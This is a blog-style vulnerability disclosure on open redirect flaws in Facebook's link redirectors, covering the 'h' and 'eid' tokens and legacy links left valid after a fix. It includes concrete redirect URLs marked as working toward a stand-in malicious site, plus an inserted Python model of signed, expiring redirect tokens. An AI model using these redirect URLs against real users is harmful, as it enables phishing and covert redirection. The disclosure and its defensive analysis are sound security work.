market capitalization of $212 Billion." (Wikipedia)</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b>Discovered by:</b></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 17.8181819915772px; text-align: justify;">Wang Jing, </span><span style="line-height: 17.8181819915772px; text-align: justify;">Division of Mathematical Sciences (MAS), </span><span style="line-height: 17.8181819915772px; text-align: justify;">School of Physical and Mathematical Sciences (SPMS), </span><span style="line-height: 17.8181819915772px; text-align: justify;">Nanyang Technological University (NTU), </span><span style="line-height: 17.8181819915772px; text-align: justify;">Singapore. (<a href="https://twitter.com/justqdjing/status/554206258413043713" target="_blank">@justqdjing</a>)</span></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<a href="http://www.tetraph.com/wangjing/" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.tetraph.com/wangjing/</span></a></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b>(1) General Vulnerabilities Description:</b></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b>(1.1)</b> <b>Two Facebook vulnerabilities are introduced in this article.</b></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Facebook has a web security bug that can be exploited in Open Redirect attacks. It allows an attacker to create a specially crafted URL that, if clicked, redirects the victim from the intended legitimate website to an arbitrary website of the attacker's choosing. Such attacks are effective because the crafted URL initially appears to point to a page on a trusted site. This can be leveraged to direct an unsuspecting user to a web page containing attacks that target client-side software such as a web browser or document rendering programs.</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;">Since Facebook is trusted by a large number of other websites, these vulnerabilities can be used to perform "Covert Redirect" attacks against other websites such as Amazon, eBay, GoDaddy, Yahoo, 163 and Mail.ru.</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b>(1.1.1)</b></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">One Facebook Open Redirect vulnerability was reported to Facebook, and Facebook adopted a new mechanism to patch it. Although the reported URL redirection vulnerabilities are patched, all previously generated URLs are still vulnerable to the attack. Section (2) gives the details.</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">The reason may be related to Facebook's third-party interaction system, its database management system, or both. Another possible reason is Facebook's design for different kinds of browsers.</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b>(1.1.2)</b> Another new Open Redirect vulnerability related to Facebook is introduced, too. For reference, please read section (3).</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;">The vulnerabilities can be exploited without the user being logged in. Tests were performed on IE (9.0) on Windows 8, Firefox (24.0) & Google Chromium 30.0.1599.114 ubuntu0.14.04.1.1064 (64-bit) on Ubuntu (12.10), and Safari 6.1.6 on Mac OS X Lion 10.7.</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b>(1.2)</b> Facebook's URL Redirection System Related to "*.php" Files</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">All URL redirection is based on several files, such as l.php, a.php, landing.php and so on.</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">The main redirection is based on the file "l.php" (almost all redirection links use it at present).</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">For the file "l.php", one parameter, "h", is used for authentication. For the file "a.php", the parameter "eid" is used for authentication. Both files use the parameter "u" for the URL redirected to. In some other files, such as "landing.php", parameters such as "url" and "next" are used.</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">&lt;1&gt; For parameter "h", two forms of authentication are used.</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">h=HAQHyinFq</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">h=hAQHalW1CAQHrkVIQNNqgwhxRWLNsFVeH3auuImlbR1CgKA</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">&lt;2&gt; For parameter "eid", one form of authentication is used.</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">eid=[long example token omitted]</span></div>
</div>
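<div style="margin: 0px;"><span style="font-family: Arial, Helvetica, sans-serif;">The redirector pattern above, an outgoing link whose "u" parameter names the destination and whose "h" token must authenticate it, is modelled in the following added example (my own code, not Facebook's). It assumes a constructed legacy scheme with unkeyed, non-expiring tokens and a constructed hardened scheme with keyed, versioned, expiring tokens, and shows why a verifier that keeps honouring legacy tokens leaves every previously generated link usable, which is the condition section (2) describes.</span></div>

```python
"""Signed redirect links modelled on the l.php?u=...&h=... pattern.

Added example, not Facebook's code.  Each outgoing link carries the
destination in "u" and a token in "h" that must authenticate that
destination.  The legacy scheme issues tokens with no key and no expiry, so
every link minted under it stays valid; the hardened scheme binds the token
to a key version and an expiry.  A redirector that still accepts legacy
tokens after the fix is the "old generated URLs are still vulnerable" case.
Keys, hosts and token formats below are constructed for this example.
"""
import hashlib
import hmac
from typing import Optional
from urllib.parse import parse_qs, quote, urlsplit

REDIRECTOR = "https://social.example/l.php"          # constructed host
KEYS = {"v1": b"retired-key-constructed", "v2": b"current-key-constructed"}
CURRENT_KEY_ID = "v2"
TOKEN_TTL = 24 * 3600                                 # seconds


def legacy_token(u: str) -> str:
    """Legacy scheme (constructed): an unkeyed digest of the destination.

    Anyone who knows the recipe can mint a token for any destination, and
    nothing in the token ever expires.
    """
    return hashlib.sha256(u.encode()).hexdigest()[:16]


def legacy_link(u: str) -> str:
    """Link as minted before the fix: u plus an unversioned legacy token."""
    return f"{REDIRECTOR}?u={quote(u, safe='')}&h={legacy_token(u)}"


def _mac(key_id: str, exp: int, u: str) -> str:
    msg = f"{key_id}|{exp}|{u}".encode()
    return hmac.new(KEYS[key_id], msg, hashlib.sha256).hexdigest()


def signed_link(u: str, now: int, key_id: str = CURRENT_KEY_ID) -> str:
    """Hardened scheme: h = <key id>.<expiry>.<HMAC over key id, expiry, u>."""
    exp = now + TOKEN_TTL
    return f"{REDIRECTOR}?u={quote(u, safe='')}&h={key_id}.{exp}.{_mac(key_id, exp, u)}"


def resolve(link: str, now: int, accept_legacy: bool) -> Optional[str]:
    """Return the destination if the link's token authenticates it, else None.

    accept_legacy=True models a redirector that still honours tokens from the
    superseded scheme and from retired keys; accept_legacy=False is the
    hardened behaviour, which forces every old link to be re-minted.
    """
    qs = parse_qs(urlsplit(link).query)
    u = qs.get("u", [""])[0]
    h = qs.get("h", [""])[0]
    if not u or not h:
        return None
    parts = h.split(".")
    if len(parts) == 3:                                # versioned token
        key_id, exp_s, mac = parts
        if key_id not in KEYS or not exp_s.isdigit():
            return None
        if key_id != CURRENT_KEY_ID and not accept_legacy:
            return None                                # retired key version
        exp = int(exp_s)
        if exp < now:
            return None                                # expired
        # Constant-time comparison; the MAC covers key id, expiry and u, so
        # swapping the destination or the expiry invalidates the token.
        return u if hmac.compare_digest(_mac(key_id, exp, u), mac) else None
    # Unversioned token: the legacy scheme.
    if accept_legacy and hmac.compare_digest(legacy_token(u), h):
        return u
    return None


if __name__ == "__main__":
    now = 1_700_000_000
    # A link minted before the fix; legacy tokens are unkeyed, so this could
    # point anywhere and still verifies while the old scheme is honoured.
    old = legacy_link("https://unrelated.example/landing")
    new = signed_link("https://partner.example/", now)
    print(resolve(old, now, accept_legacy=True))   # https://unrelated.example/landing
    print(resolve(old, now, accept_legacy=False))  # None
    print(resolve(new, now, accept_legacy=False))  # https://partner.example/
```

The fix that matters is the retirement of the old scheme and key on the verifier side, not only the issuing side; as long as `accept_legacy` stays true, every link generated before the change continues to redirect.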
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEijRvRlzyViMgAr3yrxYKI-MxLhCK7OAYmG-2ORBZrWqQYFOI5v_tfSxGwuNfQfurZSgcOVM9zKsyf-oUzZzgBQF7bKm2R0rwqS4dRzlI_jnLcLFs2mdpK5xTeoCN59ZRJgZO6SRA9WtrjN/s1600/facebook_1.png" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="253" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEijRvRlzyViMgAr3yrxYKI-MxLhCK7OAYmG-2ORBZrWqQYFOI5v_tfSxGwuNfQfurZSgcOVM9zKsyf-oUzZzgBQF7bKm2R0rwqS4dRzlI_jnLcLFs2mdpK5xTeoCN59ZRJgZO6SRA9WtrjN/s400/facebook_1.png" width="400" /></a></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b>(2) Vulnerability Description 1:</b></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b>(2.1)</b> A security researcher reported two Open Redirect vulnerabilities to Facebook in 2013. The following are the two links reported.</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<a href="http://www.facebook.com/l.php?u=http://www.bing.com&h=mAQHgtP_E" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.facebook.com/l.php?<wbr></wbr>u=http://www.bing.com&h=<wbr></wbr>mAQHgtP_E</span></a></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<a href="http://facebook.com/campaign/landing.php?url=http://www.adcash.com" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://facebook.com/campaign/<wbr></wbr>landing.php?url=http://www.<wbr></wbr>adcash.com</span></a></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Though a new mechanism was adopted, all previously generated redirections still work via the parameters "h" and "eid". </span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b>(2.2)</b> The website "<a href="http://www.tetraph.com/" target="_blank">http://www.tetraph.com/</a>" was used for the following tests; suppose this website is malicious.</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b>(2.2.1)</b></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">&lt;1&gt; First test</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">&lt;a&gt; file: "l.php"</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">&lt;b&gt; URL parameter: "u"</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">&lt;c&gt; authentication parameter: "h"</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">&lt;d&gt; form: "h=HAQHyinFq".</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">&lt;e&gt; The authentication token has no relation to any of the other parameters, such as "s".</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Examples:</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b>URL 1:</b></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://www.facebook.com/l.php?u=http%3A%2F%2Fwww.aboutads.info%2F&h=lAQHmVMhS&s=1" target="_blank">http://www.facebook.com/l.php?<wbr></wbr>u=http%3A%2F%2Fwww.aboutads.<wbr></wbr>info%2F&h=lAQHmVMhS&s=1</a></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b>Redirect Forbidden:</b></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://www.facebook.com/l.php?u=http%3A%2F%2Fwww.tetraph.com&h=lAQHmVMhS&s=1" target="_blank">http://www.facebook.com/l.php?<wbr></wbr>u=http%3A%2F%2Fwww.tetraph.<wbr></wbr>com&h=lAQHmVMhS&s=1</a></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b>Redirect Works:</b></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<a href="http://www.facebook.com/l.php?u=http%3A%2F%2Fwww.tetraph.com&h=zAQHEyzSM&s=1" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.facebook.com/l.php?<wbr></wbr>u=http%3A%2F%2Fwww.tetraph.<wbr></wbr>com&h=zAQHEyzSM&s=1</span></a></div>
</div>
